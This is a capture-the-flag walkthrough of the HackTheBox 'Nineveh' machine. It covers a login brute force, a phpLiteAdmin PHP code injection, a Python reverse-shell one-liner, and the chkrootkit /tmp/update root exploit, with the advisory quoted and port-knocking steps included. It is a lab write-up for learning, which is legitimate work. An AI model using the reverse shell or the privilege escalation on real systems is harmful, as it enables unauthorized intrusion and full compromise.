HackTheBox — Nineveh


Nmap 7.80 scan initiated Thu Sep 17 14:33:38 2020 as: nmap -sC -sV -A -oN initial
Nmap scan report for
Host is up (0.19s latency).
Not shown: 998 filtered ports
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

Scanning reveals two open ports: HTTP on 80 and HTTPS on 443.

Add nineveh.htb (the commonName from the TLS certificate) to the hosts file.

Using GoBuster, we find a directory called /db.

Heading over to https://nineveh.htb/db/index.php gives us the phpLiteAdmin login form.

phpLiteAdmin is a web front-end for managing SQLite databases. Running hydra against this login form gave us admin:password123.

Log in to phpLiteAdmin. There is a database called test at /var/tmp/test, and it has no tables. Run searchsploit on phpliteadmin:

PHPLiteAdmin 1.9.3 — Remote PHP Code Injection

Since we are logged into phpLiteAdmin as admin, we can rename the database so that it has a .php extension,
put some PHP code in the text fields of a table, and execute it by requesting the file in the browser.
We need to save the database as ninevehNotes.php, because the server checks for "ninevehNotes" in the name.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got a shell as www-data.

Next we write procmon.sh, a neat process monitoring script. It does not monitor everything running on the system as pspy would, only new processes that start while the script is running.

#!/bin/bash
# Take a snapshot of the process list, then print only the lines that change each second
old_process=$(ps -eo user,command)
while true; do
    new_process=$(ps -eo user,command)
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process   # compare against the latest snapshot so each change prints once
done

We see a script called vulnScan.sh being run. Hopefully by root :) Its contents:


/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt

chkrootkit is a tool for checking a system for rootkits. It has a flaw that is triggered by writing a file called update in the /tmp directory.

We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the
shellscript chkrootkit:

slapper (){
   SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
   SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
   SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
   OPT="-an"
   STATUS=0
   file_port=

   if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1
   then
      STATUS=1
      [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
         $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' | tr -d :`
   fi
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i    # unquoted: when file_port is empty this runs $i as a command
         STATUS=1
      fi
   done
   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Slapper Worm installed ($file_port)"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
      return ${NOT_INFECTED}
   fi
}

The line ‘file_port=$file_port $i’ will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running on (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.

- Put an executable file named ‘update’ with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

Write a reverse shell to /tmp/update and wait for the callback as root.
chkrootkit is almost always run as root.
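To see why the unquoted assignment matters, here is an added shell example (not from the write-up or from chkrootkit itself) that reproduces the slapper() pattern against a harmless stand-in for /tmp/update in a private temporary directory, beside the quoted form that only appends to the variable:

```shell
#!/bin/bash
# Added example: the chkrootkit slapper() assignment bug, reproduced against a
# harmless stand-in script in a constructed temp dir, next to the fixed form.
workdir=$(mktemp -d)             # constructed sandbox standing in for /tmp
trap 'rm -rf "$workdir"' EXIT

# Stand-in for /tmp/update: it only leaves a marker file recording who ran it.
cat > "$workdir/update" <<'EOF'
#!/bin/sh
echo "ran as $(id -un)" > "$(dirname "$0")/marker"
EOF
chmod +x "$workdir/update"

# Vulnerable pattern, as in slapper(): with file_port empty, the shell parses
# "file_port=$file_port $i" as a temporary environment assignment followed by
# the command $i, so the matching file is executed instead of being recorded.
vulnerable_collect() {
    file_port=
    for i in "$workdir/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    echo "$file_port"
}

# Fixed pattern: the quotes keep the whole thing one assignment word, so the
# path is appended to file_port and nothing is executed.
fixed_collect() {
    file_port=
    for i in "$workdir/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

# Returns 0 if the stand-in was executed since the last call, 1 otherwise.
was_executed() {
    if [ -f "$workdir/marker" ]; then
        rm -f "$workdir/marker"
        return 0
    fi
    return 1
}
```

Running vulnerable_collect executes the stand-in (the marker appears and the returned list is empty); fixed_collect returns the path and leaves no marker.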

We get a reverse shell as root. Voila! We can grab both the root and user flags. Direct privesc to root!

However, the intended way of doing this is through the user amrois.

Our nmap scan did not show SSH as open, but ps -ef | grep sshd showed sshd running on the system. The port was being filtered by iptables rules.

Here's the knockd configuration file (readable only by root), which sets up port knocking:

Heading over to https://nineveh.htb/secure_notes, we get an image, nineveh.png. Running binwalk on this image:

After extracting the folder, we get the public and private SSH keys for the user amrois.

SSH is, however, filtered: a port knocking service is running. We need to send TCP SYN packets to the specified ports, in order, to open the SSH port.

Checking the /var/mail directory, we get the knock sequence 571, 290, 911.

Use nmap to send SYN packets to these ports in that order:

for i in 571 290 911; do nmap -Pn -p $i --host_timeout 201 --max-retries 0 nineveh.htb; done 

After successfully port knocking, we have SSH open. Use the amrois keys to SSH into the box and get the user flag.

Use the chkrootkit exploit from above to get root access. ;)

Rayaan Hussain